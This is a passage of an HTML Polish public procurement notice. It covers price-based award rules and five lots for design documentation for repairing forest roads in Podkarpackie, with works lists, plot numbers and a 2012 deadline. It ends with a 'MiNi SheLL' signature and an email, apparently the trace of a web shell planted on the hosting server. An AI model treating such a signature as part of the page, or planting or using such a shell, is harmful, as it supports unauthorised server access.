Cn - najniższa ofertowa cena (brutto) spośród wszystkich ważnych ofert;
Co - cena oferty ocenianej (brutto).
3.	Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą ilość punktów.
4.	Zamawiający udzieli zamówienia wykonawcy, którego oferta odpowiada wszystkim wymaganiom przedstawionym w ustawie - Prawo zamówień publicznych oraz SIWZ  i została oceniona, jako najkorzystniejsza w oparciu o podane powyżej kryterium wyboru tj. otrzyma największą ilość punktów.
5.	Ocenie podlegać będą ceny brutto.
6.	Jeżeli w postępowaniu o zamówienie zostały złożone oferty o takiej samej cenie, (uzyskają taka samą ilość punktów), Zamawiający wzywa Wykonawców do złożenia w określonym przez siebie terminie ofert dodatkowych. Składając oferty dodatkowe, Zamawiający nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.
7.	W przypadku Wykonawcy zagranicznego, który na podstawie odrębnych przepisów nie jest zobowiązany do uiszczenia podatku VAT na terytorium Rzeczypospolitej Polskiej i który w formularzu oferty poda cenę z zerową stawką VAT, Zamawiający na etapie oceny i porównania ofert doliczy do ceny ofertowej podatek od towarów i usług VAT, zgodnie  z art. 91 ust. 3a ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych  (Dz. U. z 2010 r. Nr 113 poz. 759 z późn. zm.).
8.	W toku oceny ofert Zamawiający może żądać od Wykonawcy pisemnych wyjaśnień dotyczących treści złożonej oferty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na remont drogi leśnej Borownica-Brzeżawa nr. inw. 220/326 długości 1636 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. W ramach zamówienia należy opracować w wersji papierowej i elektronicznej kompletną   dokumentację projektową obejmującą:
a)	Projekt budowlany- uproszczony (4 egz.),
b)	Kosztorys inwestorski (1 egz.),
c)	Kosztorys - ślepy (1 egz.),
d)	Przedmiar robót ( 1 egz),
e)	Szczegółową specyfikację techniczną wykonania i odbioru robót( 1 egz.).
2)	W projekcie należy uwzględnić:
- mechaniczne wyprofilowanie istniejącej nawierzchni i poboczy przy użyciu równarki i walca,
- wypełnienie ubytków tłuczniem z mechanicznym zagęszczeniem,
- wykonanie nawierzchni z tłucznia kamiennego sortowanego z zagęszczeniem,
- oczyszczenie i pogłębienie rowów,
- oczyszczenie przepustów,
- wzmocnienie nawierzchni zjazdów na szlaki zrywkowe i składy drewna przy drodze,
- wzmocnienie składów drewna,
- montaż przepustów,
oraz innych niewymienionych robót niezbędnych do prawidłowego wykonania planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres dokumentacji muszą być zaakceptowane przez Zamawiającego.
3)	Ponadto należy wykonać badania geotechniczne gruntu.
4)	W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć koszt 1 aktualizacji dla zadań 1, 2, 3, 4, 5.
2. Lokalizacja drogi przeznaczonej do remontu: woj. podkarpackie, powiat przemyski , Gmina Bircza, numery działek ewidencyjnych: 2/7, 2/8 . 
3. Szczegółowy przebieg drogi przewidzianej do remontu przedstawia załącznik nr 9 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na remont drogi leśnej Borownica-Brzeżawa nr. inw. 220/327 długości 1000 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. W ramach zamówienia należy opracować w wersji papierowej i elektronicznej kompletną   dokumentację projektową obejmującą:
a)	Projekt budowlany- uproszczony (4 egz.),
b)	Kosztorys inwestorski (1 egz.),
c)	Kosztorys - ślepy (1 egz.),
d)	Przedmiar robót ( 1 egz),
e)	Szczegółową specyfikację techniczną wykonania i odbioru robót( 1 egz.).
2)	W projekcie należy uwzględnić:
- mechaniczne wyprofilowanie istniejącej nawierzchni i poboczy przy użyciu równarki i walca,
- wypełnienie ubytków tłuczniem z mechanicznym zagęszczeniem,
- wykonanie nawierzchni z tłucznia kamiennego sortowanego z zagęszczeniem,
- oczyszczenie i pogłębienie rowów,
- oczyszczenie przepustów,
- wzmocnienie nawierzchni zjazdów na szlaki zrywkowe i składy drewna przy drodze,
- wzmocnienie składów drewna,
- montaż przepustów,
oraz innych niewymienionych robót niezbędnych do prawidłowego wykonania planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres dokumentacji muszą być zaakceptowane przez Zamawiającego.
3)	Ponadto należy wykonać badania geotechniczne gruntu.
4)	W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć koszt 1 aktualizacji dla zadań 1, 2, 3, 4, 5.
3.Lokalizacja drogi przeznaczonej do remontu: 
- woj. podkarpackie, powiat brzozowski, Gmina  Dydnia, numery działek ewidencyjnych: 331, 324, 322.  
- woj. podkarpackie, powiat przemyski, Gmina  Bircza, numery działek ewidencyjnych: 2/4, 2/5, 2/2.                       
4. Szczegółowy przebieg drogi przewidzianej do remontu przedstawia załącznik nr 10  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na remont drogi leśnej Lipa-Żohatyn nr. inw. 242/173 długości 4 500 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. W ramach zamówienia należy opracować w wersji papierowej i elektronicznej kompletną   dokumentację projektową obejmującą:
a)	Projekt budowlany- uproszczony (4 egz.),
b)	Kosztorys inwestorski (1 egz.),
c)	Kosztorys - ślepy (1 egz.),
d)	Przedmiar robót ( 1 egz),
e)	Szczegółową specyfikację techniczną wykonania i odbioru robót( 1 egz.).
2)	W projekcie należy uwzględnić:
- mechaniczne wyprofilowanie istniejącej nawierzchni i poboczy przy użyciu równarki i walca,
- wypełnienie ubytków tłuczniem z mechanicznym zagęszczeniem,
- wykonanie nawierzchni z tłucznia kamiennego sortowanego z zagęszczeniem,
- oczyszczenie i pogłębienie rowów,
- oczyszczenie przepustów,
- wzmocnienie nawierzchni zjazdów na szlaki zrywkowe i składy drewna przy drodze,
- wzmocnienie składów drewna,
- montaż przepustów,
oraz innych niewymienionych robót niezbędnych do prawidłowego wykonania planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres dokumentacji muszą być zaakceptowane przez Zamawiającego.
3)	Ponadto należy wykonać badania geotechniczne gruntu.
4)	W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć koszt 1 aktualizacji dla zadań 1, 2, 3, 4, 5.
3. Lokalizacja drogi przeznaczonej do remontu: woj. podkarpackie, powiat przemyski , Gmina Bircza, numery działek ewidencyjnych: 263, 267, 267/20, 267/11, 265/7, 230/1.
4. Szczegółowy przebieg drogi przewidzianej do remontu przedstawia załącznik nr 11  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na remont drogi leśnej Huta Poręby-Borownica nr. inw. 242/128 długości 2 500 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. W ramach zamówienia należy opracować w wersji papierowej i elektronicznej kompletną   dokumentację projektową obejmującą:
a)	Projekt budowlany- uproszczony (4 egz.),
b)	Kosztorys inwestorski (1 egz.),
c)	Kosztorys - ślepy (1 egz.),
d)	Przedmiar robót ( 1 egz),
e)	Szczegółową specyfikację techniczną wykonania i odbioru robót( 1 egz.).
2)	W projekcie należy uwzględnić:
- mechaniczne wyprofilowanie istniejącej nawierzchni i poboczy przy użyciu równarki i walca,
- wypełnienie ubytków tłuczniem z mechanicznym zagęszczeniem,
- wykonanie nawierzchni z tłucznia kamiennego sortowanego z zagęszczeniem,
- oczyszczenie i pogłębienie rowów,
- oczyszczenie przepustów,
- wzmocnienie nawierzchni zjazdów na szlaki zrywkowe i składy drewna przy drodze,
- wzmocnienie składów drewna,
- montaż przepustów,
oraz innych niewymienionych robót niezbędnych do prawidłowego wykonania planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres dokumentacji muszą być zaakceptowane przez Zamawiającego.
3)	Ponadto należy wykonać badania geotechniczne gruntu.
4)	W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć koszt 1 aktualizacji dla zadań 1, 2, 3, 4, 5.
3. Lokalizacja drogi przeznaczonej do remontu: woj. podkarpackie, powiat przemyski, Gmina Bircza, numery działek ewidencyjnych: 469/2, 428/2, 428/5, 428/6
4. Szczegółowy przebieg drogi przewidzianej do remontu przedstawia załącznik nr 12 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na remont drogi leśnej Iskań-Dylągowa nr. inw. 220/311 długości 2 235 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. W ramach zamówienia należy opracować w wersji papierowej i elektronicznej kompletną   dokumentację projektową obejmującą:
a)	Projekt budowlany- uproszczony (4 egz.),
b)	Kosztorys inwestorski (1 egz.),
c)	Kosztorys - ślepy (1 egz.),
d)	Przedmiar robót ( 1 egz),
e)	Szczegółową specyfikację techniczną wykonania i odbioru robót( 1 egz.).
2)	W projekcie należy uwzględnić:
- mechaniczne wyprofilowanie istniejącej nawierzchni i poboczy przy użyciu równarki i walca,
- wypełnienie ubytków tłuczniem z mechanicznym zagęszczeniem,
- wykonanie nawierzchni z tłucznia kamiennego sortowanego z zagęszczeniem,
- oczyszczenie i pogłębienie rowów,
- oczyszczenie przepustów,
- wzmocnienie nawierzchni zjazdów na szlaki zrywkowe i składy drewna przy drodze,
- wzmocnienie składów drewna,
- montaż przepustów,
oraz innych niewymienionych robót niezbędnych do prawidłowego wykonania planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres dokumentacji muszą być zaakceptowane przez Zamawiającego.
3)	Ponadto należy wykonać badania geotechniczne gruntu.
4)	W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć koszt 1 aktualizacji dla zadań 1, 2, 3, 4, 5.
3. Lokalizacja drogi przeznaczonej do remontu: woj. podkarpackie, powiat przemyski, Gmina Dubiecko, numery działek ewidencyjnych:  193/3, 193/5, 193/6, 193/7, 193/8, 193/9, 885/3, 885/4, 885/6.
4. Szczegółowy przebieg drogi przewidzianej do remontu przedstawia załącznik nr 13  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com